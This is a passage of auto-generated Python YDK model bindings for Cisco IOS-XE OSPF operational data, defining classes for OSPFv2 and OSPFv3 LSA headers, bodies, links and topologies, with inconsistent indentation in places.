                    self.ylist_key_names = ['lsa_type']
                    self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))])
                    self._leafs = OrderedDict([
                        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                    ])
                    self.lsa_type = None
                    # Child list of AreaScopeLsa_ entries.
                    self.area_scope_lsa = YList(self)
                    self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']"
                    # Freeze last; subsequent writes go via _perform_setattr.
                    self._is_frozen = True
                # Only the declared leaf name is assignable after construction.
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value)
class AreaScopeLsa_(Entity):
"""
List of OSPF link scope LSAs
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
                    # One decoded LSA entry keyed by (lsa-type, adv-router).  It carries
                    # both OSPFv2 and OSPFv3 child containers/lists; only the ones
                    # matching the LSA version are expected to be populated.
                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__()
                        self.yang_name = "area-scope-lsa"
                        self.yang_parent_name = "area-scope-lsa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['lsa_type','adv_router']
                        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))])
                        self._leafs = OrderedDict([
                            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                        ])
                        self.lsa_type = None
                        self.adv_router = None
                        self.decoded_completed = None
                        # raw-data is a leaf-list of octets (wire-format LSA).
                        self.raw_data = []
                        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa()
                        self.ospfv2_lsa.parent = self
                        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
                        self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa()
                        self.ospfv3_lsa.parent = self
                        self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
                        self.ospfv2_link = YList(self)
                        self.ospfv2_topology = YList(self)
                        self.ospfv2_external = YList(self)
                        self.ospfv3_link = YList(self)
                        self.ospfv3_prefix = YList(self)
                        self.ospfv3_ia_prefix = YList(self)
                        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
                        # Freeze last; subsequent writes go via _perform_setattr.
                        self._is_frozen = True
                    # Only the declared leaf names are assignable after construction.
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
                    class Ospfv2Lsa(Entity):
                        """
                        OSPFv2 LSA
                        .. attribute:: header
                            Decoded OSPFv2 LSA header data
                            **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header>`
                            **config**\: False
                        .. attribute:: lsa_body
                            Decoded OSPFv2 LSA body data
                            **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody>`
                            **config**\: False
                        """
                        # YANG module prefix/revision this binding was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        # Container with two presence children: header and lsa-body.
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__()
                            self.yang_name = "ospfv2-lsa"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))])
                            # No leafs of its own — children only.
                            self._leafs = OrderedDict()
                            self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header()
                            self.header.parent = self
                            self._children_name_map["header"] = "header"
                            self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody()
                            self.lsa_body.parent = self
                            self._children_name_map["lsa_body"] = "lsa-body"
                            self._segment_path = lambda: "ospfv2-lsa"
                            # Freeze last; subsequent writes go via _perform_setattr.
                            self._is_frozen = True
                        # No assignable leafs (empty allowed-name list).
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value)
                        class Header(Entity):
                            """
                            Decoded OSPFv2 LSA header data
                            .. attribute:: lsa_id
                                LSA ID
                                **type**\: union of the below types:
                                **type**\: str
                                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                **type**\: str
                                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                **config**\: False
                            .. attribute:: opaque_type
                                Opaque type
                                **type**\: int
                                **range:** 0..255
                                **config**\: False
                            .. attribute:: opaque_id
                                Opaque ID
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: age
                                LSA age
                                **type**\: int
                                **range:** 0..65535
                                **config**\: False
                            .. attribute:: type
                                LSA type
                                **type**\: int
                                **range:** 0..65535
                                **config**\: False
                            .. attribute:: adv_router
                                LSA advertising router
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: seq_num
                                LSA sequence number
                                **type**\: str
                                **config**\: False
                            .. attribute:: checksum
                                LSA checksum
                                **type**\: str
                                **config**\: False
                            .. attribute:: length
                                LSA length
                                **type**\: int
                                **range:** 0..65535
                                **config**\: False
                            .. attribute:: flag_options
                                LSA options
                                **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
                                **config**\: False
                            """
                            # YANG module prefix/revision this binding was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            # Register leaf descriptors for the decoded LSA header.
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__()
                                self.yang_name = "header"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                    ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                                    ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                                    ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                    ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                    ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                    ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                                ])
                                self.lsa_id = None
                                self.opaque_type = None
                                self.opaque_id = None
                                self.age = None
                                self.type = None
                                self.adv_router = None
                                self.seq_num = None
                                self.checksum = None
                                self.length = None
                                # Bitmask leaf gets an empty Bits container, not None.
                                self.flag_options = Bits()
                                self._segment_path = lambda: "header"
                                # Freeze last; subsequent writes go via _perform_setattr.
                                self._is_frozen = True
                            # Only the declared leaf names are assignable after construction.
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
                        class LsaBody(Entity):
                            """
                            Decoded OSPFv2 LSA body data
                            .. attribute:: num_of_links
                                Number of links
                                **type**\: int
                                **range:** 0..65535
                                **config**\: False
                            .. attribute:: network
                                Network details
                                **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network>`
                                **config**\: False
                            .. attribute:: summary_mask
                                Summary mask
                                **type**\: union of the below types:
                                **type**\: str
                                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                **type**\: str
                                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                **config**\: False
                            .. attribute:: external_mask
                                External mask
                                **type**\: union of the below types:
                                **type**\: str
                                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                **type**\: str
                                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                **config**\: False
                            .. attribute:: body_flag_options
                                LSA body flags
                                **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
                                **config**\: False
                            """
                            # YANG module prefix/revision this binding was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            # Register the "network" child and body leafs.
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__()
                                self.yang_name = "lsa-body"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))])
                                self._leafs = OrderedDict([
                                    ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                                    ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                                    ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                                    ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                                ])
                                self.num_of_links = None
                                self.summary_mask = None
                                self.external_mask = None
                                # Bitmask leaf gets an empty Bits container, not None.
                                self.body_flag_options = Bits()
                                self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network()
                                self.network.parent = self
                                self._children_name_map["network"] = "network"
                                self._segment_path = lambda: "lsa-body"
                                # Freeze last; subsequent writes go via _perform_setattr.
                                self._is_frozen = True
                            # Only the declared leaf names are assignable after construction.
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
                            class Network(Entity):
                                """
                                Network details
                                .. attribute:: network_mask
                                    IP network mask
                                    **type**\: union of the below types:
                                    **type**\: str
                                    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                    **type**\: str
                                    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                    **config**\: False
                                .. attribute:: attached_router
                                    List of the routers attached to the network
                                    **type**\: list of int
                                    **range:** 0..4294967295
                                    **config**\: False
                                """
                                # YANG module prefix/revision this binding was generated from.
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                # Register leafs for the network-LSA details container.
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__()
                                    self.yang_name = "network"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                    ])
                                    self.network_mask = None
                                    # attached-router is a leaf-list (router IDs).
                                    self.attached_router = []
                                    self._segment_path = lambda: "network"
                                    # Freeze last; subsequent writes go via _perform_setattr.
                                    self._is_frozen = True
                                # Only the declared leaf names are assignable after construction.
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
                    class Ospfv2Link(Entity):
                        """
                        Router LSA link
                        .. attribute:: link_id (key)
                            Link ID
                            **type**\: int
                            **range:** 0..4294967295
                            **config**\: False
                        .. attribute:: link_data (key)
                            Link data
                            **type**\: int
                            **range:** 0..4294967295
                            **config**\: False
                        .. attribute:: type
                            Link type
                            **type**\: int
                            **range:** 0..255
                            **config**\: False
                        .. attribute:: ospfv2_topology
                            Topology specific information
                            **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology>`
                            **config**\: False
                        """
                        # YANG module prefix/revision this binding was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        # List entry keyed by (link-id, link-data); keys are baked
                        # into the segment path.
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__()
                            self.yang_name = "ospfv2-link"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['link_id','link_data']
                            self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))])
                            self._leafs = OrderedDict([
                                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                            ])
                            self.link_id = None
                            self.link_data = None
                            self.type = None
                            # Per-topology metrics child list.
                            self.ospfv2_topology = YList(self)
                            self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                            # Freeze last; subsequent writes go via _perform_setattr.
                            self._is_frozen = True
                        # Only the declared leaf names are assignable after construction.
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
                        class Ospfv2Topology(Entity):
                            """
                            Topology specific information
                            .. attribute:: mt_id (key)
                                MT\-ID for topology enabled link
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: metric
                                Metric for the topology
                                **type**\: int
                                **range:** 0..65535
                                **config**\: False
                            """
                            # YANG module prefix/revision this binding was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            # List entry keyed by "mt-id"; key baked into the segment path.
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__()
                                self.yang_name = "ospfv2-topology"
                                self.yang_parent_name = "ospfv2-link"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['mt_id']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                ])
                                self.mt_id = None
                                self.metric = None
                                self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                                # Freeze last; subsequent writes go via _perform_setattr.
                                self._is_frozen = True
                            # Only the declared leaf names are assignable after construction.
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                    class Ospfv2Topology(Entity):
                        """
                        Summary LSA
                        .. attribute:: mt_id (key)
                            MT\-ID for topology enabled link
                            **type**\: int
                            **range:** 0..4294967295
                            **config**\: False
                        .. attribute:: metric
                            Metric for the topology
                            **type**\: int
                            **range:** 0..65535
                            **config**\: False
                        """
                        # YANG module prefix/revision this binding was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        # Sibling of Ospfv2Link.Ospfv2Topology: same leafs, but its
                        # parent node is "area-scope-lsa" (summary-LSA topology list).
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__()
                            self.yang_name = "ospfv2-topology"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['mt_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                            ])
                            self.mt_id = None
                            self.metric = None
                            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                            # Freeze last; subsequent writes go via _perform_setattr.
                            self._is_frozen = True
                        # Only the declared leaf names are assignable after construction.
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the 'ospfv2-external' list entry."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__()
    self.yang_name = "ospfv2-external"
    self.yang_parent_name = "area-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['mt_id']  # YANG list key leaf
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # Leaf descriptors; forwarding-address accepts two string forms (IPv4 or IPv6 per the docstring patterns)
    self._leafs = OrderedDict([
        ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
    ])
    self.mt_id = None
    self.metric = None
    self.forwarding_address = None
    self.external_route_tag = None
    # XPath segment for this entry, keyed by mt-id
    self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and child containers for the 'ospfv3-lsa' node."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__()
    self.yang_name = "ospfv3-lsa"
